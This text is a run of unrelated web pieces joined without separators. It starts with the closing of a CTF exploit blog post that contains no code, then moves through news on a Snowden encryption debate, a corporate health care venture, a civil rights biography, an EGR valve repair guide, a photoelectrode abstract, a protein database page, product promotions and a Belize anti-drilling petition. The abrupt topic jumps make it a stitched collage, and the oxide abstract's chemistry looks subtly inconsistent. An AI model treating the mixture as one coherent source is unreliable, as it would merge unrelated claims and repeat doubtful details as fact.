Let's stop for a second and consider everything that just happened: just because someone forgot a simple size check when copying data to memory, the door to an arbitrary code execution exploit was opened. The consequences of apparently innocent mistakes in memory-unsafe languages can be quite scary indeed. Also, while the vulnerability itself is simple, the exploit is not (just look at everything I had to write to explain how I managed to pull it off). My exploit is not perfect, and I am sure this process can be optimized a lot. But I wanted to stay as close to my final result as possible to show that even someone with little practice can come up with an exploit; it is only a matter of a loooot of determination. Solving this CTF was painfully fun; it took me weeks.
At points I was almost certain I would not be able to put all the pieces together, but in the end I managed to do it. I hope this blog post is helpful to you in some way, whether by clarifying how certain exploitation techniques work or by pointing you in the right direction on how to solve a CTF. For now, until next time! May you live until you die!
Any debate in the United States that includes Edward Snowden, who leaked troves of classified information to Glenn Greenwald and Laura Poitras in 2013, is bound to look a little unusual. Snowden is currently in Russia on indefinite asylum as he remains sought on espionage charges by federal authorities. Nonetheless, via a televised link, he took the stage at New York University on Tuesday to debate CNN's Fareed Zakaria on how the government should respond to the security challenges posed by encryption.

The debate focused on whether law enforcement should be able to access any and all encrypted communications as long as it had a court order, a question that has only become more pressing with the major messaging apps WhatsApp and Viber recently boosting their users' privacy with end-to-end encryption.

Zakaria argued that a court order should authorize the government to seize any information it requires and that obstructing this process amounts to a threat to national security. He said that a fully encrypted bank would allow embezzlers a safe haven from any kind of investigation. "I understand within a democracy, you have to sacrifice liberty for democracy at some point," Zakaria said, according to The Intercept. "You cannot have an absolute zone of privacy."

Snowden responded by pointing to the inherent technological challenges in making all encrypted data available for the taking. He argued that what amounts to a "backdoor" to encryption would never be truly secure in the government's hands and would jeopardize the fundamental security of the internet. "For the government to unlock everything there has to be a key to everything. Every other person in the world can find that key and use it too," he said. "It's a fundamental problem of science."

Encryption may pose difficulties for law enforcement, but that doesn't mean we shouldn't accept those challenges in the greater scheme of things, Snowden argued.
Law enforcement can still break into encrypted technology if it gains access by discovering passwords or even finding individual backdoors, like the FBI did with the San Bernardino iPhone. “Encryption is not an unbreakable wall,” Snowden said. “Or if it is, it is one we can get around, if we are patient, if we are careful, if we think and plan how to go about our investigations.” Zakaria then acknowledged that ditching encryption altogether, as a recent bill in the U.S. Senate would do, is also a poor answer to these questions, so the government will have to work to understand the obstacles faced by technology companies in accessing encrypted data. “If WhatsApp says we literally do not know how to write this code — WhatsApp could demonstrate to a court that they don’t have to do it,” Zakaria said. At the end, he stressed the need to address the government’s role in investigations before another major attack made any reasonable debate irrelevant in the ensuing political circus. “We do face real threats out there. There are people out there trying to do bad things. Once they happen, the government will be given carte blanche,” he said. As a whistleblower who has worked to curb the excesses of the post-9/11 security state, Snowden was only too happy to agree.
On January 30th, 2018, Amazon’s Jeff Bezos, Berkshire Hathaway’s Warren Buffett, and JP Morgan Chase’s Jamie Dimon announced a new partnership to address the health care crisis. With a stated aim of “improving employee satisfaction and reducing costs,” the three companies plan to “provide US employees and their families with simplified, high-quality, and transparent health care at a reasonable cost”—all while operating “free from profit-making incentives and constraints.” While Amazon, Berkshire Hathaway, and JP Morgan Chase are not the first companies to proclaim a desire to decrease their health care costs and disrupt the marketplace, this unique combination of partners deserves our attention. If anyone can tackle such an enormous challenge, it’s these three titans of their respective industries. US Spending on Health Care in 2016 v. 2017 Assets for Amazon & Friends Founded in 1994, Amazon is the newest of the three companies involved in this venture. However, Amazon’s assets exceed $131 billion and it employs more than 500,000 people. Berkshire Hathaway boasts far more in assets—$702 billion—and employs 370,000 people, while JP Morgan Chase boasts $2.5 trillion in assets and employs 250,000. Together, these three companies employ more than a million people and have more than $3 trillion dollars in assets to support whatever project, venture, or company that will emerge from this agreement. In health care, does size matter? Yes and no. It’s not that “might makes right” in the health care industry. As illustrated above, size matters because these groups have ample reserve capital and long-term thinking embedded in their strategies. This partnership signals something new: an attempt to build fresh internal approaches to health care spending, rather than a venture capital-driven tactic to immediately maximize investments. 
If Amazon, Berkshire Hathaway, and JP Morgan Chase reduce or level out their own health care costs, their strategy could potentially serve as a blueprint for other large employers. Given that possibility, coupled with the vast resources available to them, then yes, size could matter. Or it could not—one million employees are a lot, but they represent an incredibly small portion of overall health care costs across the country. Even if Amazon, Berkshire Hathaway, and JP Morgan Chase do discover a way to reduce their own internal costs, it’s still difficult to span the chasm from internal cost-cutting to influencing the broader health care environment. That said, if the three companies intend to play the long game and don’t have to worry about immediate results beyond their own internal focus, things could play out in several different ways. “Fix” internal, stay internal Once they understand the obstacles to expanding into the broader market, Amazon, Berkshire Hathaway, and JP Morgan Chase could pull their resources together, simply decide to tackle internal health care costs, and leave it at that. Given the ambitious nature of their announcement and the reputations of each company, this is the least likely scenario. “Fix” internal, start own insurance(-ish) plan While working to reduce their own internal costs, the three companies could feasibly develop a new type of insurance plan or program: one that focuses on the particular needs and issues of operations at large international companies. This is a possible outcome, though not probable. “Fix” internal, sell technology solutions Given the way Amazon has reinvented the online marketplace—in 2017, they dominated by capturing 44% of all online sales in the US—this new venture could develop into a technology magnet for other elements of the health care industry. 
This seems to be the most likely outcome, especially since Amazon possesses the know-how and capabilities to reshape the way customers interact with embedded systems. Paired with Berkshire Hathaway’s involvement in health care reinsurance (essentially, a backstop for health insurance companies) and JP Morgan Chase’s financing arm, this seems like a plausible end-point. The exact nature and timing of such a development is unknown. First, these three companies will have to figure out how to bend their own cost curves before others will be drawn to any external plans they offer. The technologies that Amazon, Berkshire Hathaway, and JP Morgan could employ range from: - Simply having better, more actionable data to track and reduce their costs - Creating a system to automatically track and negotiate or reduce health care expenses Talk about a wide-open scenario. Some have jumped to extremes when examining the possible influence of this partnership on health care as a whole. Given the size of the three companies involved, their available investment capital, and the possibility of an entirely new company driving innovation, the long-term approach taken by Amazon, Berkshire Hathaway, and JP Morgan Chase could change the underlying health care landscape. Will hospitals and clinics deliver more care via telehealth? Will that negatively or positively impact patients? No clear answers exist yet. The bigger shift will come from the way that consumers interact with health care systems—and the way those systems interact with individual consumers, as well.
Bernice Smith White

Bernice Smith White was born in Maryland on February 27, 1924. White is known as a community worker, civic leader, educator, and a leader in the struggle for equal rights for women. She was educated in the Baltimore City Public Schools, and received her B.S. degree in Education from Coppin State College (formerly known as Coppin Teacher's College). She furthered her education in the fields of political science, government, personnel management, behavioral aspects of management, labor relations, and equal opportunity at Morgan State University, Community College of Baltimore, George Washington University, University of Maryland, and Fisk University. She taught in the Baltimore school system for about 12 years. Her interest in young people led her to the Baltimore Urban League, where she became active as a volunteer in programs to provide job opportunities for youths. As a result of her research and studies about the school dropout rate, she conducted a local radio program on Radio WEBB. She later left the school system to embark on a career to prove that women could succeed in other fields. As the first Director of Community Education and Relations of the Baltimore City Community Relations Commission, she worked tirelessly to bring her organization's message to Maryland. She interpreted the City's civil rights law for the public via radio, television, movies, print media, workshops, and conferences. This experience led to her appointment as the first woman Insurance Compliance Specialist for the Social Security Administration. In this position, she traveled across the country monitoring affirmative action programs of government Medicare contractors to ensure equality of opportunity for minorities and women. In July 1969, she was appointed one of only three full-time National Directors of the Federal Women's Program, which was established under Executive Order of the President.
Through her work in this program, Bernice became a recognized authority in the field and served as a consultant and resource person for the former U.S. Civil Service Commission. She lectured locally and nationally at conferences, workshops, and schools. In October, 1972, she was promoted to the position of Community Relations Officer for Social Security Administration - again another first. Due to the growth of activities in this area, a Community Relations Staff was created and she was named Chief of the Headquarters Coordination and Liaison Staff, Office of Governmental Affairs. This staff served as the primary source of advice and information regarding the public's position and opinions on SSA Entitlement Programs. She retired from the Social Security Administration in May, 1984. She found that, although it is difficult, a woman can succeed in this so-called "man's world." It was out of this that she created the title for her weekly column in the Baltimore Afro American, "It's Not A Man's World." She gained national recognition because of this column and the wealth of information it contained. She was guest columnist from 1969-1974. Bernice found time to be very active in voter registration and voter education programs and in many aspects of the political life of the Baltimore community. Through her affiliation with Woman Power, she worked with women to make them more politically aware and informed on current issues. She initiated the move to have sex included in the Provisions of Acts of Discrimination in the City Civil Rights Ordinance No. 103. The amendment was passed in August, 1971 and signed into law by the Mayor. Currently, she is the first African-American chair of the Baltimore City Commission for Women. Mrs. White began her tenure with the commission in 1990. In January 1995, the Honorable Kurt L. Schmoke, Mayor of the City of Baltimore, appointed her as chairperson. 
Her participation in civic, religious, and professional organizations has been long and rewarding. She has held membership on many boards, commissions, and is often sought after to chair or serve on philanthropic ventures and health and welfare fund-raising projects. She was appointed by former Governor Harry Hughes to serve on the Eastern Region Foster Care Review Board for Baltimore City. The Honorable Parris N. Glendening presented a Governor's Citation to her, acknowledging the Valued Hours Award she received from the Fullwood Foundation. Bernice Smith White's continued dedication to creating awareness and cultivating understanding has benefited women in the State of Maryland.
Be Active: Learn to Ski!

January is National Learn to Ski Month! In support of this initiative, Beech Mountain Resort will hold a (regional, local, national) poster design contest to promote learning to ski and snowboard.

Eligibility: The contest is open to all 3rd – 5th grade students (regional, local, national)

Dimensions and Form: All entries must be original flat, two-dimensional drawings, paintings, or renderings. No photographs permitted. Posters should be at least 8.5”x11” and can be no larger than 11”x17”.

Theme: Poster designs should be derived from the theme.

Categories: Male and Female

Prizes:
1st: A beginner ski or board setup (courtesy of FLOW Snowboards and Atomic skis), one full day in the BMR Youth Learning Center, two additional tickets, and a helmet and goggle set from SCOTT Sports
2nd: One lift ticket, rental, and first-time beginner lesson at Beech Mountain Resort
3rd: One first-time beginner lesson at Beech Mountain Resort

Deadline: January 31, 2012

Posters will be displayed at Beech Mountain Resort in the View Haus Cafeteria. The Beech Mountain Resort staff of certified instructors will judge the entries. Winners will be announced on February 1, 2012.

Send entries to:
ATTN: Poster Contest
Beech Mountain Resort
P.O. Box 1118
Beech Mountain, NC 28604

For More Information: Talia Freeman, (828) 387-2011 ext 205
The insight you need, when you need it, anywhere in the world On December 4, 2021, Mount Semeru volcano erupted on Java Island, Indonesia. Semeru, the tallest mountain on Java, spewed ash that blanketed nearby villages and sent people fleeing in panic. The eruption destroyed buildings and severed a bridge connecting two areas in the nearby district of Lumajang, with the city of Malang. As of December 7, the Indonesian disaster agency said the death toll rose to 34, with up to 27 missing. The volcano erupted again on Monday, December 6, and Indonesia’s Center for Volcanology and Geological Hazard Mitigation warned of continued seismic activity. Analysis-Ready Data (ARD) is Maxar's subscription service providing users access to time-series stacks of imagery with specific preprocessing (atmospheric compensation, radiometric correction, orthorectification and alignment) to minimize the work and time required to derive answers from pixels. Learn more about ARD here.
Most vehicles are now equipped with an Exhaust Gas Recirculation (EGR) valve to reduce emissions. Several symptoms can point to EGR valve problems: a failed emissions test, poor idling, or random changes in engine speed. There are a few methods for testing an EGR valve if you're unsure that it's defective. If the EGR valve is faulty, it takes only a few steps and tools to replace it.

Testing with a Scan Tool

1. Use a scan tool to test the EGR valve. A scan tool reads information from your On-Board Diagnostics, version II (OBD-II) system. This system collects information from the sensors in your engine. If a sensor detects something wrong, it reports it as an error code to the OBD-II system. A scan tool allows you to read this code. The scan tool plugs into the OBD-II data link connector, which is usually located under the dash.
2. Locate the OBD-II data connector. The most common location for the OBD-II connector is under the dash by the steering wheel. The owner's manual should have the exact location if you have trouble finding it.
3. Turn the ignition to the on position. Place your key in the ignition and turn it to on, but do not start the engine. You only want the electrical systems running.
4. Connect the scan tool to the OBD-II data link connector. The scan tool will prompt you to fill in some information about your vehicle. It usually requires information about the make, model, engine, and year of the vehicle.
   - Most scan tools draw power from the vehicle's battery and do not require a separate power source.
5. Read the results. The scan tool will display any error codes the OBD-II system reports. If the result is in the P0400 to P0409 range, then the EGR valve may be faulty.

Testing with a Multimeter

1. Use a multimeter to test the EGR valve. A multimeter tests the electrical wiring in your vehicle. The multimeter has a few settings, but you only need to set it to Volts for this test. The multimeter has black (negative) and red (positive) leads with metal clamps that connect to the wiring in your engine.
   - It's recommended that you use a digital multimeter for this test. A digital multimeter will display only the test results. An analog multimeter will be harder to read because every possible result on its range is printed at the top.
2. Set the multimeter to read Volts. A large "V" denotes the voltage setting. The range for the volts is located between two bold lines.
3. Find the EGR valve. Consult your owner's manual to find the exact location of the valve, as it varies depending on the make and model of your vehicle. Once you have located the valve, look for an electrical connector on top of it. This connector has the circuits you need to test.
4. Clip the multimeter's red lead onto the "C" circuit. Each circuit on the EGR valve is labeled from "A" to "E."
5. Clip the multimeter's negative lead to a ground in the engine. The easiest and closest ground is the negative post on the vehicle's battery.
6. Look at the readings. If the multimeter shows a reading above 0.9 Volts, then something (most likely carbon) is blocking the EGR valve. If the multimeter shows little or no voltage, then the EGR valve is most likely faulty. If the reading is between 0.6 and 0.9 Volts, then the EGR valve is working properly.

Replacing the EGR Valve

1. Purchase the correct EGR valve for the make and model of your vehicle. Check your owner's manual to find the right one. If you cannot find the correct EGR valve there, check a parts manual or with an associate at an auto parts store.
2. Let your engine cool. Wait several hours before you begin working on your vehicle. You can injure yourself very easily while working on a hot engine, so let it sit a few hours.
3. Disconnect the battery. Use a wrench to loosen the clamps on the battery's two terminals. Be sure to wait at least 5 minutes after disconnecting the battery before you begin working on the engine. You want the system to discharge completely.
   - Always wear the appropriate safety gear before working on your engine.
4. Locate the EGR valve. It is usually located on either the top or backside of the engine. Consult your owner's manual if you need help finding it.
5. Disconnect the vacuum lines. Twist and pull each line until it slides off the EGR valve. Each line connects to a specific port. Label each one so that you can easily reconnect them.
6. Disconnect the electrical cable. The electrical cable is located on top of the EGR valve. Grab the electrical cable with your hands and pull it.
   - If the electrical cable is held in by a clip or clamp, use a flat-bladed screwdriver to press it down and release it.
7. Use a wrench to remove the bolts on the EGR valve's mount. Use lubricant spray on the bolts because they are usually very tight.
8. Take out the old EGR valve. Now that you have removed the bolts, use your hands to remove the valve from its mount.
   - Inspect the valve for signs of carbon buildup. Sometimes this buildup causes the valve to malfunction. If you find buildup, clean it off and reinstall the valve. Test the valve again to see if it works after cleaning it.
9. Clean the valve base and passages. Use a scratch awl or something similar to remove any carbon buildup. Clean any debris or buildup from the gasket surface.
   - Use carburetor or intake cleaner to help remove the carbon.
10. Install the new EGR valve. Thread the bolts through the EGR valve and gasket onto the mount with your hands first. Then use a socket wrench with a swivel extension to tighten the mounting bolts once you have seated the EGR valve in the engine.
    - When purchasing a new valve, see if it comes with a new gasket. You will have to purchase one if it doesn't.
11. Reconnect the electrical cable. Plug the cable back into the top of the EGR valve using your hands.
12. Hook up the vacuum lines. Reattach each line using your hands. Make sure that they are tight to prevent leaks.
13. Reconnect the battery. Attach the engine leads to the battery terminals. Use a wrench to tighten the bolts.
14. Clear your scan tool. If you used a scan tool to test your EGR valve, clear any error codes related to the valve. Then test again to see if any error codes appear.
15. Listen for leaks. Start your engine and listen for any leaks near the EGR valve. The two possible places leaks might occur are the vacuum hose and the exhaust. Drive the vehicle to make sure that it runs correctly. Pay close attention to the idling and gas mileage of your vehicle, as poor performance in these areas indicates that the EGR valve is faulty.

- Consult your owner's manual and write down the security code for your car's radio, disc player, or display device. Disconnecting the battery will cause the radio to reset and lock, and you will need this code to unlock it.
- Always wear safety glasses when working near your car.

Things You'll Need
- Lubricant spray
- Socket wrench with swivel extension
- Safety glasses
- New EGR valve for your vehicle (if you don't know the part #, an auto parts store or website can help you find it)
- OBD-II scan tool (for vehicles built 1996 and later)
- Multimeter (auto-ranging is preferred)
- Scratch awl
- Flat-blade screwdriver

Sources and Citations
- http://www.popularmechanics.com/cars/how-to/maintenance/4267896
- http://easyautodiagnostics.com/gm/4.3L-5.0L-5.7L/egr-valve-tests-1
- http://www.familyhandyman.com/electrical/how-to-use-a-multimeter/view-all
- http://easyautodiagnostics.com/gm/4.3L-5.0L-5.7L/egr-valve-tests-2
- http://www.ebay.com/gds/How-to-Replace-EGR-Components-/10000000178532985/g.html
- http://www.carsdirect.com/car-maintenance/egr-valve-cleaning-and-replacement-instructions
- http://www.adrianneyoung.com/serendipity/index.php?/archives/214-How-to-Replace-an-EGR-Valve.html
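The voltage thresholds from the multimeter test above can be summarized as a small decision function. This is only a sketch (the function name is made up; the thresholds come from the steps above):

```python
def diagnose_egr(voltage):
    """Interpret the EGR valve 'C' circuit reading (in volts)."""
    if voltage > 0.9:
        return "blocked"   # likely carbon buildup obstructing the valve
    if voltage >= 0.6:
        return "ok"        # valve operating normally
    return "faulty"        # little or no voltage: valve is likely bad

print(diagnose_egr(0.75))  # ok
```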
Year of publication: 1391 (2012)
Venue: First National Conference on Environmental Protection and Planning
Number of pages: 6

Kourosh Motevalli – Instructor, Applied Chemistry Department, Fundamental Sciences Faculty, Islamic Azad University
Zahra Yaghoubi – Assistant Professor, Industrial Faculty, Islamic Azad University, South Tehran Branch, Tehran, Iran

The photoelectrolysis of water to yield hydrogen and oxygen using visible light has enormous potential for solar energy harvesting if suitable photoelectrode materials can be developed. Few of the materials with a band gap suitable for visible light activation have the necessary band edge potentials or photochemical stability to be suitable candidates. Osmium oxide (Ebg = 2.8 eV) is a good candidate, with absorption up to λ ≈ 440 nm and known photochemical stability. Thin films of osmium oxide were prepared using an electrolytic route from peroxo-osmium precursors. The osmium oxide thin films were characterised by FESEM, Auger electron spectroscopy, and photoelectrochemical methods. The magnitude of the photocurrent response of the films under solar-simulated irradiation showed a dependence on the precursor used in the film preparation, with a comparatively lower response for samples containing impurities. The photocurrent response spectrum of the osmium oxide films was more favourable than that recorded for titanium dioxide (TiO2) thin films. The OsO3 photocurrent response was of equivalent magnitude but shifted into the visible region of the spectrum, as compared to that of TiO2.
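The quoted absorption edge is consistent with the standard band-gap-to-wavelength relation λ (nm) ≈ 1240 / Eg (eV); a quick check:

```python
def bandgap_to_wavelength_nm(eg_ev):
    # hc ≈ 1240 eV·nm, so the absorption edge sits at λ = 1240 / Eg
    return 1240.0 / eg_ev

print(round(bandgap_to_wavelength_nm(2.8)))  # 443, i.e. absorption up to ~440 nm
```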
MOAD release: 2014

Binding MOAD Statistics
- 25771 Protein-Ligand Structures
- 9142 Binding Data
- 12440 Different Ligands
- 7599 Different Families

Welcome to Binding MOAD!

What is Binding MOAD? We have created a subset of the Protein Data Bank (PDB), containing every high-quality example of ligand-protein binding. Hence, we call it the Mother of All Databases (MOAD). Binding MOAD's goal is to be the largest collection of well-resolved protein crystal structures with clearly identified biologically relevant ligands, annotated with experimentally determined binding data extracted from the literature.

Binding MOAD criteria for inclusion:

...biologically relevant ligands...

Ligands may be:
- a peptide of 10 amino acids or less
- an oligonucleotide of 4 nucleotides or less
- a small organic molecule (e.g. ibuprofen)
- a cofactor (e.g. NADPH)

Ligands are not:
- crystallographic additives (e.g. polyethylene glycol)
- buffers (e.g. Tris, CHAPS)
- metals (e.g. Rb)
- metallic catalytic centers (e.g. FeS, NiFe)
- solvents (e.g. DMSO)

...a structure with a resolution of 2.5 Å or better...

...binding data extracted from the literature...

We've searched through the primary reference of each PDB entry looking for Kd, Ki, and IC50 data. If we've got something wrong or if you have something to add, please let us know - we'll correct it, and give you credit.

NOTE:
- We have gone through all the single HET group ligands and updated the SMILES to the current PDB Component Dictionary OpenEye Canonical form.
- In order to properly view the website, please make sure Java is installed on your system and JavaScript is enabled on your browser (see FAQ).

Cite Binding MOAD:
- L Hu, ML Benson, RD Smith, MG Lerner, HA Carlson. Binding MOAD (Mother Of All Databases). Nucleic Acids Research.
- A Ahmed, RD Smith, JJ Clark, JB Dunbar, HA Carlson. Recent improvements to Binding MOAD: a resource for protein-ligand binding affinities and structures. Nucleic Acids Research.
- ML Benson, RD Smith, NA Khazanov, B Dimcheff, J Beaver, P Dresslar, J Nerothin, and HA Carlson. Binding MOAD, a high-quality protein-ligand database. Nucleic Acids Research.

University of Michigan
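The inclusion criteria above amount to a simple filter over PDB entries: acceptable resolution plus at least one biologically relevant ligand. A hedged sketch of such a filter (the field names and type labels are illustrative, not Binding MOAD's actual schema):

```python
# Sketch of Binding MOAD-style inclusion rules: keep structures at
# 2.5 Å resolution or better whose ligand is biologically relevant.
# Field names and type categories here are assumptions for illustration.

VALID_LIGAND_TYPES = {"peptide", "oligonucleotide", "small_organic", "cofactor"}
EXCLUDED_TYPES = {"additive", "buffer", "metal", "catalytic_center", "solvent"}

def is_valid_ligand(ligand: dict) -> bool:
    """Apply the 'biologically relevant ligand' rules from the criteria."""
    if ligand["type"] in EXCLUDED_TYPES:
        return False
    if ligand["type"] == "peptide":
        return ligand["length"] <= 10       # peptides of 10 residues or fewer
    if ligand["type"] == "oligonucleotide":
        return ligand["length"] <= 4        # 4 nucleotides or fewer
    return ligand["type"] in VALID_LIGAND_TYPES

def include_entry(resolution: float, ligands: list) -> bool:
    """A structure qualifies at <= 2.5 Å with at least one valid ligand."""
    return resolution <= 2.5 and any(is_valid_ligand(l) for l in ligands)

print(include_entry(2.1, [{"type": "peptide", "length": 8}]))   # True
print(include_entry(2.1, [{"type": "buffer"}]))                 # False
```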
Explain the auditor’s responsibility to consider compliance with laws and regulations. How does this responsibility differ for laws and regulations that have a direct effect on the financial statements compared to other laws and regulations that do not have a direct effect?
We have introduced several home 3D printers, but if you need more functionality, the following FABtotum personal fabricator should catch your eye. The FABtotum is a multi-functional personal fabrication device that comes in three sizes for different purposes. Unlike a normal 3D printer, the personal fabricator features an awesome combination of 3D printer, 3D scanner, and milling machine. Using FFF (Fused Filament Fabrication), the FABtotum is capable of high-speed printing of 3D models in PLA/ABS, and its built-in heated bed helps prints proceed smoothly for higher-quality models; moreover, its dual head with an engraving/milling spindle motor lets it work with many common materials such as wood, light aluminum or brass alloys. The fabrication device is also a 3D scanner: using its built-in laser scanner the FABtotum can acquire both small and complex objects, and with the help of its 3D printing feature you won't have to worry about having enough 3D creations to fill your showcase. Apart from that, as a milling machine the FABtotum can even help you make your own circuit boards. Additionally, the fabricator can be controlled not only via a computer, but also via LAN, wireless LAN and remotely over the Internet, and as an open-source project developers can easily bring more functions to the combo of 3D printer, 3D scanner and milling machine. After the break, check out the following demo video. At present the FABtotum team is raising funds on Indiegogo. Pledging $999 will let you own the fabrication device. If you're interested, jump to the Indiegogo official site for more details.
Accession Number : AD0801854 Title : EUROPEAN NUCLEAR ENERGY AGENCY: ITS FUNCTIONS AND BACKGROUND. Descriptive Note : Technical rept., Corporate Author : OFFICE OF NAVAL RESEARCH LONDON (UNITED KINGDOM) Personal Author(s) : Hemann, John W. Report Date : OCT 1966 Pagination or Media Count : 29 Abstract : This report describes the organization of the European Nuclear Energy Agency (ENEA) under the Organization for Economic Cooperation and Development (OECD), shows how its three joint projects (Eurochemic, Halden, and Dragon) are administered, and gives a brief description of their major technical features. (Author) Descriptors : (*NUCLEAR ENERGY, EUROPE), (*NUCLEAR INDUSTRIAL APPLICATIONS, EUROPE), SCIENTIFIC ORGANIZATIONS, ECONOMICS, RESEARCH MANAGEMENT, NUCLEAR REACTORS, ELECTRIC POWER PRODUCTION, PERFORMANCE(ENGINEERING), NUCLEAR PHYSICS. Subject Categories : Mfg & Industrial Eng & Control of Product Sys Nuclear Physics & Elementary Particle Physics Distribution Statement : APPROVED FOR PUBLIC RELEASE
ENGINEERS are reaching for the sky thanks to the boss of a top UK airline. Generous Jet2.com Chairman Philip Meeson has presented Coleg Cambria with a Jet Provost T5 aircraft. Mr Meeson, whose nephew is completing an aerospace apprenticeship with Cambria and Broughton-based wingmakers Airbus, donated his own personal jet to the college’s Deeside campus. Nick Tyson, Assistant Principal and Director of Learning, said the plane will add another dimension to the award-winning department’s innovative delivery of work-based learning. He thanked Mr Meeson for the gift, and added: “Having the Provost T5 on campus is a major selling point for our engineering courses as it gives students hands-on experience of working on an airplane. “We can use it to train our aerospace apprentices – of which we have more than 180 every year – and those studying on our higher education programmes and summer school qualifications. “They’ll be able to look at structures, carry out live aircraft function testing and work out aircraft processes directly, so it will be incredible training for them. “I would like to thank Mr Meeson for his kindness; we all appreciate his generosity and look forward to many years of working on the jet plane.” The Provost was used by the Royal Air Force from 1955 to 1993 as a British training jet before later being developed into a more heavily armed version for ground attack missions. With a maximum speed of almost 440mph, the aircraft is around 40ft long with a wingspan of 35ft. Mr Meeson said: “I am very proud and pleased to donate my Jet Provost aircraft to Coleg Cambria and that it will be used to train Airbus apprentices.
“I know the college provides a fantastic start for the Airbus engineers of the future and I am delighted to have been able to make this contribution.” The addition of the jet comes after the Engineering department hosted the prestigious two-day EEF (Engineering Employers Federation) conference at Cambria’s new £10m Bersham Road facility in Wrexham. Up to 25 further education lecturers came together for a packed programme of workshops and activities centred on best practice and innovative learning methods, including an advanced manufacturing visit to Airbus. For more information on the wide selection of courses and apprenticeships in Engineering at Coleg Cambria, and the summer school programme, click here.
We were saddened to hear of the death of astronaut Edgar Mitchell, the last surviving member of Apollo 14, on February 4th, 45 years after his mission to the moon, which ran from Jan. 31 to Feb. 9, 1971. Mitchell was 85 years old. He retired from NASA and the Navy in 1972. Mitchell was the lunar module pilot, the job held by artist and astronaut Alan Bean on the Apollo 12 mission. The rest of the crew was commander Alan Shepard and command module pilot Stuart Roosa. Alan Bean painted several scenes from Apollo 14, including “Big Al and His Rickshaw” (Alan Shepard and the modularized equipment transport, which was the first wheeled vehicle on the moon), “Sunrise Over Antares,” and perhaps most famously, “In Flight,” Alan Shepard’s golf swing with Ed Mitchell’s commentary. The Greenwich Workshop was proud to publish “Hello Universe”, a single representative astronaut in a spirited gesture of joy and wonder, in a fine art limited edition print, signed by Alan Bean, Eugene A. Cernan and Edgar D. Mitchell. “Here we are, humans of planet Earth, standing on our only moon. Getting there wasn’t easy; in fact, it took about four hundred thousand of us giving our best efforts. None could do it alone but together we found a way to achieve this seemingly impossible dream. When the time is right, we will be ready to continue our noble quest to expand humanity’s reach. Our children and our children’s children will have to continue the search, each succeeding generation moving a little farther out, discovering more answers and even greater questions. The Universe awaits our audacious human spirit. Be patient . . . we are coming.” Countersigners: Eugene A. Cernan and Edgar D. Mitchell.
Public Presentation at the Lion's Den on Tuesday, June 14, 2011 at 7pm. The great news is that we have reached the 17,000 signatures needed to trigger a referendum on oil exploration offshore and in protected areas. Now the real work begins. We need to get the voting population of Belize out to vote. The Belize Coalition is embarking on an outreach campaign to inform the voting population of the negative impacts of oil exploration in Belize. The Belize Coalition is planning public presentations throughout the country. The Ambergris Caye Citizens for Sustainable Development is working together with them on their first presentation here in San Pedro. We take this opportunity to invite you to attend this presentation on Tuesday, June 14th, 2011 at the Lion's Den at 7pm. Why we are against offshore oil drilling in Belize: just a few of our legal concerns. Sign petitions at our office upstairs of Blu Gift Shop or print the one attached to the bottom of this page and have all your friends sign it. Economic impacts of offshore drilling and exploration - presentation written by Mr. Edilberto Romero of APAMO. Mayor Elsa Paz of San Pedro made a call to the island's Reef Radio during a talk show hosting members of the coalition, to express her support for the initiative. A day later, Vice-President of Oceana, Audrey Matura-Shepherd, praised Mayor Paz's declaration of support and called it a bold and decisive action that will give important momentum to their cause. Matura-Shepherd says the Mayor's backing is already reaping benefits for the coalition in a petition drive to collect signatures.
Audrey Matura-Shepherd, Vice-President, OCEANA

Belize Coalition to Save our Natural Heritage
Urgent action needed to protect our Barrier Reef Reserve System and our Protected Areas from oil exploration and drilling
June 8, 2010

Considering that there has been a complete parceling out of the entire country of Belize, except for the Maya Mountains, for oil exploration and drilling, it has become necessary for members of civil society to join forces and unite under one Coalition to be able to approach the Government on behalf of the people of Belize. The Belize Coalition to Save Our Natural Heritage is to be a conduit of the voice of the masses and will at all times have the best interest of Belize and its people at heart. All members have pledged to act without reservation to protect our people and their rights to our natural heritage.

The members of the Belize Coalition to Save our Natural Heritage jointly call on the Government of Belize to:

A. Adopt a resolution declaring a BAN on OFFSHORE oil exploration and drilling in our Belizean waters;
B. Adopt a resolution declaring a BAN on oil exploration and drilling in ALL our PROTECTED AREAS;
C. Initiate an open and transparent process to review and strengthen the existing legislation (e.g. Petroleum Act, EIA Regulations and other relevant Acts and Regulations) to regulate oil exploration and drilling in Belize;
D. Develop a comprehensive Petroleum Policy and Plan along with an Energy Plan for Belize;
E. Put in place the necessary measures to effectively monitor and regulate the oil industry in Belize;
F. Conduct meaningful consultation with the people of Belize prior to the engagement in agreements for oil exploration and drilling in Belize.

The Coalition is therefore engaging the larger public to participate in the charting of the course that this country will take as it relates to the future of the oil industry of Belize. As members of civil society, the Coalition brings to light the following concerns:

1. That oil exploration and drilling is a matter of national interest to the people of Belize and as such the people of this nation have not been consulted or involved in this critical national issue;
2. That there is no area in our waters or land, except for the Maya Mountains, spared from oil exploration and drilling in this country;
3. That the integrity of our Belize Barrier Reef System, a World Heritage Site, is being compromised and exposed to an additional pressure and threat;
4. That oil companies are not subjected to the requirements that other businesses and the people of Belize have to abide by within protected areas;
5. That the legal framework in place is not suitable to ensure public safety in the event that there is ever an accident or oil spill;
6. That there is no legal framework in place to ensure that the Belizean public, as a class, have quick and direct access to the legal system without waiting for an action by the Attorney General;
7. That the monies already being contributed to the economy through tourism and fisheries are being taken for granted when addressing the economic development of Belize through oil development;
8. That the lifestyle and cultural rights of our people to the use and enjoyment of our marine resources and protected areas are being threatened;
9. That there is no transparency and accountability in the way Government awards concessions and enters into power-sharing agreements with oil companies;
10. That the production sharing agreements are not in the best interest of the people of Belize.

The Belize Coalition to Save our Natural Heritage, an alliance of over 25 organizations representing the people of Belize, is calling for a BAN on oil exploration and drilling offshore and in all protected areas. We call on ALL Belizeans to support this cause, which strikes at the ownership of our heritage. Our livelihoods and lifestyle will be threatened if WE allow oil exploration and drilling offshore and in protected areas.
